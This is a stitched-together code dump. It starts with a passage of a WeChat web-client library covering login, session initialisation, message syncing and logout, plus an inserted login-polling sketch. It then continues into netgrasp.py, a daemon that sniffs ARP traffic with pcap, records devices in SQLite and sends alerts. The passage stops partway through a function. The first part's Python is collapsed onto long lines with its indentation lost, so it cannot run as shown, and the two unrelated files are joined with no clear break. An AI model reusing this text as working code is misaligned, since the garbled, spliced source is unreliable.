# deviceID is only a randomly generated number # UOS PATCH By luvletter2333, Sun Feb 28 10:00 PM # for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes: # if node.nodeName == 'skey': # core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data # elif node.nodeName == 'wxsid': # core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data # elif node.nodeName == 'wxuin': # core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data # elif node.nodeName == 'pass_ticket': # core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data if not all([key in core.loginInfo for key in ('skey', 'wxsid', 'wxuin', 'pass_ticket')]): logger.error('Your wechat account may be LIMITED to log in WEB wechat, error info:\n%s' % r.text) core.isLogging = False return False return True def web_init(self): url = '%s/webwxinit' % self.loginInfo['url'] params = { 'r': int(-time.time() / 1579), 'pass_ticket': self.loginInfo['pass_ticket'], } data = { 'BaseRequest': self.loginInfo['BaseRequest'], } headers = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent' : config.USER_AGENT, } r = self.s.post(url, params=params, data=json.dumps(data), headers=headers) dic = json.loads(r.content.decode('utf-8', 'replace')) # deal with login info utils.emoji_formatter(dic['User'], 'NickName') self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount']) self.loginInfo['User'] = wrap_user_dict(utils.struct_friend_info(dic['User'])) self.memberList.append(self.loginInfo['User']) self.loginInfo['SyncKey'] = dic['SyncKey'] self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val']) for item in dic['SyncKey']['List']]) self.storageClass.userName = dic['User']['UserName'] self.storageClass.nickName = dic['User']['NickName'] # deal with contact list returned when init contactList = dic.get('ContactList', []) chatroomList, otherList = [], [] for m in contactList: if m['Sex'] != 0: otherList.append(m) elif '@@' in m['UserName']: m['MemberList'] = [] # don't let dirty info pollute the list chatroomList.append(m) elif '@' in m['UserName']: # mp will be dealt in update_local_friends as well otherList.append(m) if chatroomList: update_local_chatrooms(self, chatroomList) if otherList: update_local_friends(self, otherList) return dic def show_mobile_login(self): url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % ( self.loginInfo['url'], self.loginInfo['pass_ticket']) data = { 'BaseRequest' : self.loginInfo['BaseRequest'], 'Code' : 3, 'FromUserName' : self.storageClass.userName, 'ToUserName' : self.storageClass.userName, 'ClientMsgId' : int(time.time()), } headers = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent' : config.USER_AGENT, } r = self.s.post(url, data=json.dumps(data), headers=headers) return ReturnValue(rawResponse=r) def start_receiving(self, exitCallback=None, getReceivingFnOnly=False): self.alive = True def maintain_loop(): retryCount = 0 while self.alive: try: i = sync_check(self) if i is None: self.alive = False elif i == '0': pass else: msgList, contactList = self.get_msg() if msgList: msgList = produce_msg(self, msgList) for msg in msgList: self.msgList.put(msg) if contactList: chatroomList, otherList = [], [] for contact in contactList: if '@@' in contact['UserName']: chatroomList.append(contact) else: otherList.append(contact) chatroomMsg = update_local_chatrooms(self, chatroomList) chatroomMsg['User'] = self.loginInfo['User'] 
self.msgList.put(chatroomMsg) update_local_friends(self, otherList) retryCount = 0 except requests.exceptions.ReadTimeout: pass except: retryCount += 1 logger.error(traceback.format_exc()) if self.receivingRetryCount < retryCount: self.alive = False else: time.sleep(1) self.logout() if hasattr(exitCallback, '__call__'): exitCallback() else: logger.info('LOG OUT!') if getReceivingFnOnly: return maintain_loop else: maintainThread = threading.Thread(target=maintain_loop) maintainThread.setDaemon(True) maintainThread.start() def sync_check(self): url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url']) params = { 'r' : int(time.time() * 1000), 'skey' : self.loginInfo['skey'], 'sid' : self.loginInfo['wxsid'], 'uin' : self.loginInfo['wxuin'], 'deviceid' : self.loginInfo['deviceid'], 'synckey' : self.loginInfo['synckey'], '_' : self.loginInfo['logintime'], } headers = { 'User-Agent' : config.USER_AGENT } self.loginInfo['logintime'] += 1 try: r = self.s.get(url, params=params, headers=headers, timeout=config.TIMEOUT) except requests.exceptions.ConnectionError as e: try: if not isinstance(e.args[0].args[1], BadStatusLine): raise # will return a package with status '0 -' # and value like: # 6f:00:8a:9c:09:74:e4:d8:e0:14:bf:96:3a:56:a0:64:1b:a4:25:5d:12:f4:31:a5:30:f1:c6:48:5f:c3:75:6a:99:93 # seems like status of typing, but before I make further achievement code will remain like this return '2' except: raise r.raise_for_status() regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}' pm = re.search(regx, r.text) if pm is None or pm.group(1) != '0': logger.debug('Unexpected sync check result: %s' % r.text) return None return pm.group(2) def get_msg(self): url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % ( self.loginInfo['url'], self.loginInfo['wxsid'], self.loginInfo['skey'],self.loginInfo['pass_ticket']) data = { 'BaseRequest' : self.loginInfo['BaseRequest'], 'SyncKey' : self.loginInfo['SyncKey'], 'rr' : ~int(time.time()), } headers = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent' : config.USER_AGENT } r = self.s.post(url, data=json.dumps(data), headers=headers, timeout=config.TIMEOUT) dic = json.loads(r.content.decode('utf-8', 'replace')) if dic['BaseResponse']['Ret'] != 0: return None, None self.loginInfo['SyncKey'] = dic['SyncKey'] self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val']) for item in dic['SyncCheckKey']['List']]) return dic['AddMsgList'], dic['ModContactList'] def logout(self): if self.alive: url = '%s/webwxlogout' % self.loginInfo['url'] params = { 'redirect' : 1, 'type' : 1, 'skey' : self.loginInfo['skey'], } headers = { 'User-Agent' : config.USER_AGENT } self.s.get(url, params=params, headers=headers) self.alive = False self.isLogging = False self.s.cookies.clear() del self.chatroomList[:] del self.memberList[:] del self.mpList[:] return ReturnValue({'BaseResponse': { 'ErrMsg': 'logout successfully.', 'Ret': 0, }})
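# --- Illustrative sketch (not part of itchat) -----------------------------------------
# The login() loop above is a status poll over the codes returned by check_login():
# '408' means the QR code has not been scanned yet (keep waiting), '201' means it was
# scanned but not yet confirmed on the phone, and '200' means login succeeded. The
# helper below is a hypothetical, stand-alone restatement of that loop; check_status is
# any callable returning one of those status strings (for example a bound check_login).
import time


def poll_until_logged_in(check_status, interval=1, max_attempts=120):
    """Poll check_status() until it returns '200' (logged in).

    Returns True on success, False if an unexpected status is seen or the attempt
    budget (roughly interval * max_attempts seconds) is exhausted.
    """
    confirm_prompted = False
    for _ in range(max_attempts):
        status = check_status()
        if status == '200':
            return True
        if status == '201':
            if not confirm_prompted:
                logger.info('Please press confirm on your phone.')
                confirm_prompted = True
        elif status != '408':
            # '400' and other codes indicate the uuid expired or the request failed.
            return False
        time.sleep(interval)
    return False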
netgrasp.py
from utils import debug from utils import exclusive_lock from utils import email from utils import simple_timer from utils import pretty from config import config from notify import notify from database import database import logging import logging.handlers import pwd import os import datetime import time netgrasp_instance = None BROADCAST = 'ff:ff:ff:ff:ff:ff' ALERT_TYPES = ['requested_ip', 'first_requested_ip', 'first_requested_ip_recently', 'seen_device', 'first_seen_device', 'first_seen_device_recently', 'seen_mac', 'first_seen_mac', 'seen_ip', 'first_seen_ip', 'seen_host', 'first_seen_host', 'seen_vendor', 'first_seen_vendor', 'device_stale', 'request_stale', 'changed_ip', 'duplicate_ip', 'duplicate_mac', 'network_scan', 'ip_not_on_network', 'src_mac_broadcast', 'requested_self'] EVENT_REQUEST_IP, EVENT_FIRST_REQUEST_IP, EVENT_FIRST_REQUEST_RECENTLY_IP, EVENT_SEEN_DEVICE, EVENT_FIRST_SEEN_DEVICE, EVENT_FIRST_SEEN_DEVICE_RECENTLY, EVENT_SEEN_MAC, EVENT_FIRST_SEEN_MAC, EVENT_SEEN_IP, EVENT_FIRST_SEEN_IP, EVENT_SEEN_HOST, EVENT_FIRST_SEEN_HOST, EVENT_SEEN_VENDOR, EVENT_FIRST_SEEN_VENDOR, EVENT_STALE, EVENT_REQUEST_STALE, EVENT_CHANGED_IP, EVENT_DUPLICATE_IP, EVENT_DUPLICATE_MAC, EVENT_SCAN, EVENT_IP_NOT_ON_NETWORK, EVENT_SRC_MAC_BROADCAST, EVENT_REQUESTED_SELF = ALERT_TYPES DIGEST_TYPES = ['daily', 'weekly'] PROCESSED_ALERT = 1 PROCESSED_DAILY_DIGEST = 2 PROCESSED_WEEKLY_DIGEST = 4 PROCESSED_NOTIFICATION = 8 DEFAULT_CONFIG = ['/etc/netgrasp.cfg', '/usr/local/etc/netgrasp.cfg', '~/.netgrasp.cfg', './netgrasp.cfg'] DEFAULT_USER = "daemon" DEFAULT_GROUP = "daemon" DEFAULT_LOGLEVEL = logging.INFO DEFAULT_LOGFILE = "/var/log/netgrasp.log" DEFAULT_LOGFORMAT = "%(asctime)s [%(levelname)s/%(processName)s] %(message)s" DEFAULT_PIDFILE = "/var/run/netgrasp.pid" DEFAULT_DBLOCK = "/tmp/.netgrasp_database_lock" class Netgrasp(object): def __init__(self, config_filename=None): self.config = config_filename or DEFAULT_CONFIG self.listen = {} self.security = {} self.database = {} self.logging = {} self.email = {} self.notification = {} self.pcap = {} def _load_debugger(self): # We've not yet loaded configuration, so log to stdout. self.logger = logging.getLogger(__name__) self.debugger = debug.Debugger(self.verbose, self.logger, debug.PRINT) self.debugger.handler = logging.StreamHandler() formatter = logging.Formatter(DEFAULT_LOGFORMAT) self.debugger.handler.setFormatter(formatter) self.logger.addHandler(self.debugger.handler) def _enable_debugger(self): if self.daemonize: try: self.debugger.handler = logging.FileHandler(self.logging["filename"]) except Exception as e: self.debugger.error("fatal exception: %s", (e,)) self.debugger.critical("failed to open log file %s for writing (as user %s), exiting", (self.logging["filename"], self.debugger.whoami())) else: self.debugger.handler = logging.StreamHandler() formatter = logging.Formatter(DEFAULT_LOGFORMAT) self.debugger.handler.setFormatter(formatter) self.logger.addHandler(self.debugger.handler) self.logger.setLevel(self.logging["level"]) def _load_configuration(self): self.configuration = config.Config(self.debugger, filename=self.config) # Load listen parameters. self.listen["interface"] = self.configuration.GetText("Listen", "interface", None, False) self.listen["active_timeout"] = self.configuration.GetInt("Listen", "active_timeout", 60 * 60 * 2, False) delay = self.configuration.GetInt("Listen", "delay", 15, False) if delay > 30: delay = 30 elif delay < 1: delay = 1 self.listen["delay"] = delay # Load security parameters. 
self.security["user"] = self.configuration.GetText("Security", "user", DEFAULT_USER, False) self.security["group"] = self.configuration.GetText("Security", "group", DEFAULT_GROUP, False) # Load database parameters. self.database["filename"] = self.configuration.GetText("Database", "filename", None, False) self.database["lock"] = self.configuration.GetText("Database", "lockfile", DEFAULT_DBLOCK, False) self.database["gcenabled"] = self.configuration.GetBoolean("Database", "gcenabled", True, False) if self.database["gcenabled"]: self.database["oldest_arp"] = datetime.timedelta(seconds=self.configuration.GetInt("Database", "oldest_arp", 60 * 60 * 24 * 7 * 2, False)) self.database["oldest_event"] = datetime.timedelta(seconds=self.configuration.GetInt("Database", "oldest_event", 60 * 60 * 24 * 7 * 2, False)) # Load logging parameters. self.logging["filename"] = self.configuration.GetText('Logging', 'filename', DEFAULT_LOGFILE) self.logging["pidfile"] = self.configuration.GetText('Logging', 'pidfile', DEFAULT_PIDFILE, False) if self.verbose: self.logging["level"] = logging.DEBUG self.debugger.debug("log level forced to verbose") else: self.logging["level"] = self.configuration.GetText('Logging', 'level', DEFAULT_LOGLEVEL, False) # Load email parameters. self.email["enabled"] = self.configuration.GetBoolean("Email", "enabled", False, False) if self.email["enabled"]: self.email["to"] = self.configuration.GetEmailList("Email", "to", None) self.email["from"] = self.configuration.GetEmailList("Email", "from", None) self.email["hostname"] = self.configuration.GetText("Email", "smtp_hostname", None) self.email["port"] = self.configuration.GetInt("Email", "smtp_port", 587) self.email["mode"] = self.configuration.GetText("Email", "smtp_mode", None) self.email["username"] = self.configuration.GetText("Email", "smtp_username", None) self.email["password"] = self.configuration.GetText("Email", "smtp_password", None) self.email["alerts"] = self.configuration.GetTextList("Email", "alerts", None, False) self.email["digests"] = self.configuration.GetTextList("Email", "digests", None, False) # Load notification parameters. 
self.notification["enabled"] = self.configuration.GetBoolean("Notification", "enabled", False, False) if self.notification["enabled"]: self.notification["alerts"] = self.configuration.GetTextList("Notification", "alerts", None, False) def _include_dependencies(self): try: import sqlite3 except Exception as e: self.debugger.error("fatal exception: %s", (e,)) self.debugger.critical("failed to import sqlite3 (as user %s), try 'pip install sqlite3', exiting", (self.debugger.whoami())) self.debugger.info("successfuly imported sqlite3") try: import dpkt except Exception as e: self.debugger.error("fatal exception: %s", (e,)) self.debugger.critical("failed to import dpkt (as user %s), try 'pip install dpkt', exiting", (self.debugger.whoami())) self.debugger.info("successfuly imported dpkt") if self.daemonize: try: import daemonize except Exception as e: self.debugger.error("fatal exception: %s", (e,)) self.debugger.critical("failed to import daemonize (as user %s), try 'pip install daemonize', exiting", (self.debugger.whoami())) self.debugger.info("successfuly imported daemonize") if self.email["enabled"]: try: import pyzmail except Exception as e: self.debugger.error("fatal exception: %s", (e,)) self.debugger.critical("failed to import pyzmail (as user %s), try: 'pip install pyzmail' or disable [Email], exiting.", (self.debugger.whoami(),)) self.debugger.info('successfuly imported pyzmail') if self.notification["enabled"]: try: import ntfy except Exception as e: self.debugger.error("fatal exception: %s", e) self.debugger.critical("failed to import ntfy (as user %s), try 'pip install ntfy', exiting", (self.debugger.whoami())) self.debugger.info('successfuly imported ntfy') # Drop root permissions when no longer needed. def drop_root(self, ng): import grp os.setgroups([]) os.setgid(grp.getgrnam(ng.security["group"]).gr_gid) os.setuid(pwd.getpwnam(ng.security["user"]).pw_uid) ng.debugger.info('running as user %s', (self.debugger.whoami(),)) # Determine if pid in pidfile is a running process. def is_running(self): import errno running = False if self.logging["pidfile"]: if os.path.isfile(self.logging["pidfile"]): f = open(self.logging["pidfile"]) pid_string = f.readline() f.close() if pid_string: pid = int(pid_string) else: pid = 0 if pid > 0: self.debugger.info("Found pidfile %s, contained pid %d", (self.logging["pidfile"], pid)) try: os.kill(pid, 0) except OSError as e: if e.errno == errno.EPERM: running = pid else: running = pid return running # Simple, short text string used for heartbeat. HEARTBEAT = 'nghb' # Macimum seconds to process before returning to main loop MAXSECONDS = 2 # This is our main program loop. def main(*pcap): import multiprocessing from update import update ng = netgrasp_instance ng.debugger.info("main process running as user %s", (ng.debugger.whoami(),)) if not pcap: # We are running in the foreground as root. get_pcap() ng.drop_root(ng) # At this point we should no longer have/need root privileges. assert (os.getuid() != 0) and (os.getgid() != 0), 'Failed to drop root privileges, aborting.' 
ng.email["instance"] = email.Email() ng.notification["instance"] = notify.Notify() ng.debugger.info("initiating wiretap process") parent_conn, child_conn = multiprocessing.Pipe() child = multiprocessing.Process(name="wiretap", target=wiretap, args=[ng.pcap["instance"], child_conn]) child.daemon = True child.start() if child.is_alive(): ng.debugger.debug("initiated wiretap process") else: ng.debugger.debug("wiretap failed to start") try: ng.db = database.Database() except Exception: ng.debugger.dump_exception("main() caught exception creating database") ng.debugger.critical("failed to open or create %s (as user %s), exiting", (ng.database["filename"], ng.debugger.whoami())) ng.debugger.info("opened %s as user %s", (ng.database["filename"], ng.debugger.whoami())) ng.db.cursor = ng.db.connection.cursor() # http://www.sqlite.org/wal.html ng.db.cursor.execute("PRAGMA journal_mode=WAL") try: ng.db.cursor.execute("SELECT value FROM state WHERE key = 'schema_version'") schema_version = ng.db.cursor.fetchone() if schema_version: version = schema_version[0] else: version = 0 if update.needed(version): ng.debugger.critical("schema updates are required, run 'netgrasp update'") except: version = 0 create_database() if child.is_alive(): run = True else: ng.debugger.error("wiretap process gone away: %d", (child.exitcode,)) run = False last_heartbeat = datetime.datetime.now() while run: try: now = datetime.datetime.now() ng.debugger.debug("top of master while loop: %s", (now,)) parent_conn.send(HEARTBEAT) detect_stale_ips() detect_netscans() detect_anomalies() send_notifications() send_email_alerts() send_email_digests() garbage_collection() refresh_dns_cache() ng.debugger.debug("sleeping for %d seconds", (ng.listen["delay"],)) time.sleep(ng.listen["delay"]) heartbeat = False while parent_conn.poll(): message = parent_conn.recv() if message == HEARTBEAT: heartbeat = True # It's possible to receive multiple heartbeats, but many or one is the same to us. if heartbeat: ng.debugger.debug("received heartbeat from wiretap process") last_heartbeat = now if not child.is_alive(): ng.debugger.error("wiretap process gone away: %d", (child.exitcode,)) run = False # If we haven't heard from the wiretap process in >1 minute, exit. time_to_exit = last_heartbeat + datetime.timedelta(minutes=3) if now >= time_to_exit: run = False ng.debugger.error("No heartbeats from wiretap process for >3 minutes.") except Exception: ng.debugger.dump_exception("main() while loop caught exception") ng.debugger.critical("Exiting") def get_pcap(): import socket assert os.getuid() == 0, 'Unable to initiate pcap, must be run as root.' ng = netgrasp_instance try: import pcap except Exception as e: ng.debugger.error("fatal exception: %s", (e,)) ng.debugger.critical("Fatal error: failed to import pcap, try: 'pip install pypcap', exiting") devices = pcap.findalldevs() if len(devices) <= 0: ng.debugger.critical("Fatal error: pcap identified no devices, try running tcpdump manually to debug.") ng.pcap["network"], ng.pcap["netmask"] = pcap.lookupnet(ng.listen["interface"]) try: ng.pcap["instance"] = pcap.pcap(name=ng.listen["interface"], snaplen=256, promisc=True, timeout_ms = 100, immediate=True) ng.pcap["instance"].setfilter('arp') except Exception as e: ng.debugger.critical("""Failed to invoke pcap. 
Fatal exception: %s, exiting.""" % e) ng.debugger.warning("listening for arp traffic on %s: %s/%s", (ng.listen["interface"], socket.inet_ntoa(ng.pcap["network"]), socket.inet_ntoa(ng.pcap["netmask"]))) return ng.pcap # Child process: wiretap, uses pcap to sniff arp packets. def wiretap(pc, child_conn): ng = netgrasp_instance ng.debugger.debug('top of wiretap') try: import dpkt except Exception as e: ng.debugger.error("fatal exception: %s", (e,)) ng.debugger.critical("failed to import dpkt, try: 'pip install dpkt', exiting") try: import pcap except Exception as e: ng.debugger.error("fatal exception: %s", (e,)) ng.debugger.critical("failed to import pcap, try: 'pip install pypcap', exiting") assert (os.getuid() != 0) and (os.getgid() != 0), "Failed to drop root privileges, aborting." try: ng.db = database.Database() except Exception as e: ng.debugger.error("%s", (e,)) ng.debugger.critical("failed to open or create %s (as user %s), exiting", (ng.database["filename"], ng.debugger.whoami())) ng.debugger.info("opened %s as user %s", (ng.database["filename"], ng.debugger.whoami())) ng.db.cursor = ng.db.connection.cursor() run = True last_heartbeat = datetime.datetime.now() while run: try: now = datetime.datetime.now() ng.debugger.debug("[%d] top of while loop: %s", (run, now)) child_conn.send(HEARTBEAT) # Wait an arp packet, then loop again. pc.loop(1, received_arp, child_conn) heartbeat = False while child_conn.poll(): message = child_conn.recv() if message == HEARTBEAT: heartbeat = True # It's possible to receive multiple heartbeats, but many or one is the same to us. if heartbeat: ng.debugger.debug("received heartbeat from main process") last_heartbeat = now # If we haven't heard from the main process in >1 minute, exit. time_to_exit = last_heartbeat + datetime.timedelta(minutes=3) if now >= time_to_exit: run = False except Exception: ng.debugger.dump_exception("wiretap() while loop caught exception") ng.debugger.critical("No heartbeats from main process for >3 minutes, exiting.") def ip_on_network(ip): ng = netgrasp_instance try: import struct import socket ng.debugger.debug("entering address_on_network(%s)", (ip,)) numeric_ip = struct.unpack("<L", socket.inet_aton(ip))[0] cidr = sum([bin(int(x)).count("1") for x in socket.inet_ntoa(ng.pcap["netmask"]).split(".")]) netmask = struct.unpack("<L", ng.pcap["network"])[0] & ((2L<<int(cidr) - 1) - 1) return numeric_ip & netmask == netmask except: ng.debugger.dump_exception("address_in_network() caught exception") # Assumes we already have the database lock. def log_event(mid, iid, did, rid, event, have_lock = False): ng = netgrasp_instance try: ng.debugger.debug("entering log_event(%s, %s, %s, %s, %s, %s)", (mid, iid, did, rid, event, have_lock)) # Only log events for which there are subscribers. 
if (ng.email["enabled"] and event in ng.email["alerts"]) \ or (ng.notification["enabled"] and event in ng.notification["alerts"]): if have_lock: _log_event(mid, iid, did, rid, event) else: with exclusive_lock.ExclusiveFileLock(ng, 5, "log_event, " + event): _log_event(mid, iid, did, rid, event) ng.db.connection.commit() else: ng.debugger.debug("log_event: ignoring %s event, no subscribers", (event,)) except Exception: ng.debugger.dump_exception("log_event() caught exception") def _log_event(mid, iid, did, rid, event): ng = netgrasp_instance try: now = datetime.datetime.now() ng.db.connection.execute("INSERT INTO event (mid, iid, did, rid, timestamp, processed, type) VALUES(?, ?, ?, ?, ?, ?, ?)", (mid, iid, did, rid, now, 0, event)) except Exception: ng.debugger.dump_exception("_log_event() caught exception") def ip_is_mine(ip): ng = netgrasp_instance try: import socket ng.debugger.debug("entering ip_is_mine(%s)", (ip,)) return ip == socket.gethostbyname(socket.gethostname()) except Exception: ng.debugger.dump_exception("ip_is_mine() caught exception") def ip_has_changed(did): ng = netgrasp_instance try: ng.debugger.debug("entering ip_has_changed(%s)", (did,)) ng.db.cursor.execute("SELECT DISTINCT iid FROM activity WHERE did = ? ORDER BY updated DESC LIMIT 2", (did)) iids = ng.db.cursor.fetchall() #debugger.debug("ips: %s", (ips,)) if iids and len(iids) == 2: ng.db.cursor.execute("SELECT address FROM ip WHERE iid IN(?, ?)", (iids[0], iids[1])) ips = ng.db.cursor.fetchall() if ips: ip_a = ips[0] ip_b = ips[1] ng.debugger.debug("ips: %s, %s", (ip_a, ip_b)) if ip_a != ip_b: ng.debugger.info("ip for did %s changed from %s to %s", (did, ip_a[0], ip_b[0])) return True else: ng.debugger.debug("ip for did %s has not changed from %s", (did, ip_a[0])) return False else: ng.debugger.info("[%d] failed to load ips for iids: %s, %s", (did, iids[0], iids[1])) return False else: ng.debugger.debug("ip for did %s has not changed", (did,)) return False except Exception: ng.debugger.dump_exception("ip_has_changed() caught exception") # Database definitions. def create_database(): ng = netgrasp_instance try: ng.debugger.debug("Creating database tables, if not already existing.") # PRAGMA index_list(TABLE) with exclusive_lock.ExclusiveFileLock(ng, 5, "create_database"): # Create state table. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS state( id INTEGER PRIMARY KEY, key VARCHAR UNIQUE, value TEXT ) """) # @TODO make this dynamic, define globally netgrasp and schema versions ng.db.cursor.execute("INSERT OR IGNORE INTO state (key, value) VALUES('schema_version', 1)") # Record of all MAC addresses ever actively seen. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS mac( mid INTEGER PRIMARY KEY, vid TEXT, address TEXT, created TIMESTAMP, self NUMERIC ) """) ng.db.cursor.execute("CREATE UNIQUE INDEX IF NOT EXISTS idxmac_address ON mac (address)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxmac_vid ON mac (vid)") # Record of all vendors ever actively seen. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS vendor( vid INTEGER PRIMARY KEY, name VARCHAR UNIQUE, created TIMESTAMP ) """) # Record of all IP addresses ever actively seen. 
ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS ip( iid INTEGER PRIMARY KEY, mid INTEGER, address TEXT, created TIMESTAMP ) """) ng.db.cursor.execute("CREATE UNIQUE INDEX IF NOT EXISTS idxip_mid_iid ON ip (mid, iid)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxip_address_mid_created ON ip (address, mid, created)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxip_mid_iid ON ip (mid, iid)") # Cache DNS lookups. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS host( hid INTEGER PRIMARY KEY, iid INTEGER, name TEXT, custom_name TEXT, created TIMESTAMP, updated TIMESTAMP ) """) ng.db.cursor.execute("CREATE UNIQUE INDEX IF NOT EXISTS idxhost_iid ON host (iid)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxhost_name ON host (name)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxhost_custom ON host (custom_name)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxhost_updated ON host (updated)") # Record of all devices ever actively seen. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS device( did INTEGER PRIMARY KEY, mid INTEGER, iid INTEGER, hid INTEGER, vid INTEGER, created TIMESTAMP, updated TIMESTAMP ) """) ng.db.cursor.execute("CREATE UNIQUE INDEX IF NOT EXISTS idxdevice_mid_iid ON device (mid, iid)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxdevice_hid_mid_did ON device (hid, mid, did)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxdevice_vid ON device (vid)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxdevice_updated ON device (updated)") # Record of device activity. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS activity( aid INTEGER PRIMARY KEY, did INTEGER, iid INTEGER, interface TEXT, network TEXT, created TIMESTAMP, updated TIMESTAMP, counter NUMERIC, active NUMERIC ) """) ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxactivity_active_did ON activity (active, did)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxactivity_did_iid ON activity (did, iid)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxactivity_did_active_counter ON activity (did, active, counter)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxactivity_active_updated ON activity (active, updated)") # Record of all IP addresses ever requested. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS request( rid INTEGER PRIMARY KEY, did INTEGER, ip TEXT, interface TEXT, network TEXT, created TIMESTAMP, updated TIMESTAMP, counter NUMERIC, active NUMERIC ) """) ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxrequest_active_updated ON request (active, updated)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxrequest_updated ON request (updated)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxrequest_active_ip ON request (active, ip)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxrequest_did_created ON request (did, created)") # Create arp table. ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS arp( aid INTEGER PRIMARY KEY, did INT, src_mac TEXT, src_ip TEXT, rid INT, dst_mac TEXT, dst_ip TEXT, interface TEXT, network TEXT, timestamp TIMESTAMP ) """) ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxarp_srcip_timestamp_rid ON arp (src_ip, timestamp, rid)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxarp_rid_srcip ON arp (rid, src_ip)") # Create event table. 
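            # Note: the "processed" column is treated as a bitmask elsewhere in this file
            # (email alerts check "processed & 1", notifications check "processed & 8"),
            # which lets each alerting subsystem mark events as handled independently.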
ng.db.cursor.execute(""" CREATE TABLE IF NOT EXISTS event( eid INTEGER PRIMARY KEY, mid INTEGER, iid INTEGER, did INTEGER, rid INTEGER, interface TEXT, network TEXT, timestamp TIMESTAMP, processed NUMERIC, type VARCHAR ) """) ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxevent_type_timestamp_processed ON event (type, timestamp, processed)") ng.db.cursor.execute("CREATE INDEX IF NOT EXISTS idxevent_timestamp_processed ON event (timestamp, processed)") # PRAGMA index_list(event) # Update internal sqlite3 table and index statistics every time we restart. ng.db.cursor.execute("ANALYZE") ng.db.connection.commit() except Exception: ng.debugger.dump_exception("create_database() caught exception") # We've sniffed an arp packet off the wire. def received_arp(hdr, data, child_conn): ng = netgrasp_instance try: import socket import struct import dpkt from utils import exclusive_lock ng.debugger.debug("entering received_arp") now = datetime.datetime.now() packet = dpkt.ethernet.Ethernet(data) src_ip = socket.inet_ntoa(packet.data.spa) src_mac = "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB", packet.src) dst_ip = socket.inet_ntoa(packet.data.tpa) dst_mac = "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB", packet.dst) seen, requested, mid, iid, did, rid, src_mac_broadcast, ip_not_on_network, requested_self = (True, True, None, None, None, None, False, False, False) if src_mac == BROADCAST: seen = False ng.debugger.info("Ignoring arp source of %s [%s], destination %s [%s]", (src_ip, src_mac, dst_ip, dst_mac)) src_mac_broadcast = True if not ip_on_network(src_ip): seen = False ng.debugger.info("IP not on network, source of %s [%s], dst %s [%s]", (src_ip, src_mac, dst_ip, dst_mac)) ip_not_on_network = True if (dst_ip == src_ip) or (dst_mac == src_mac): requested = False ng.debugger.info("requesting self %s [%s], ignoring", (src_ip, src_mac)) requested_self = True # ARP REQUEST if packet.data.op == dpkt.arp.ARP_OP_REQUEST: ng.debugger.debug('ARP REQUEST from %s [%s] to %s [%s]', (src_ip, src_mac, dst_ip, dst_mac)) if seen: mid, iid, did = device_seen(src_ip, src_mac) if requested: rid = device_request(dst_ip, dst_mac) # ARP REPLY elif packet.data.op == dpkt.arp.ARP_OP_REPLY: ng.debugger.debug('ARP REPLY from %s [%s] to %s [%s]', (src_ip, src_mac, dst_ip, dst_mac)) if seen: mid, iid, did = device_seen(src_ip, src_mac) with exclusive_lock.ExclusiveFileLock(ng, 5, "received_arp, arp"): ng.db.cursor.execute("INSERT INTO arp (did, rid, src_mac, src_ip, dst_mac, dst_ip, timestamp) VALUES(?, ?, ?, ?, ?, ?, ?)", (did, rid, src_mac, src_ip, dst_mac, dst_ip, now)) ng.debugger.debug("inserted into arp (%s, %s, %s, %s, %s, %s, %s)", (did, rid, src_mac, src_ip, dst_mac, dst_ip, now)) if src_mac_broadcast: log_event(mid, iid, did, rid, EVENT_SRC_MAC_BROADCAST, True) if ip_not_on_network: log_event(mid, iid, did, rid, EVENT_IP_NOT_ON_NETWORK, True) if requested_self: log_event(mid, iid, did, rid, EVENT_REQUESTED_SELF, True) ng.db.connection.commit() except Exception: ng.debugger.dump_exception("received_arp() caught exception") def device_seen(ip, mac): ng = netgrasp_instance try: import datetime ng.debugger.debug("entering device_seen(%s, %s)", (ip, mac)) now = datetime.datetime.now() rid, seen_mac, first_seen_mac, 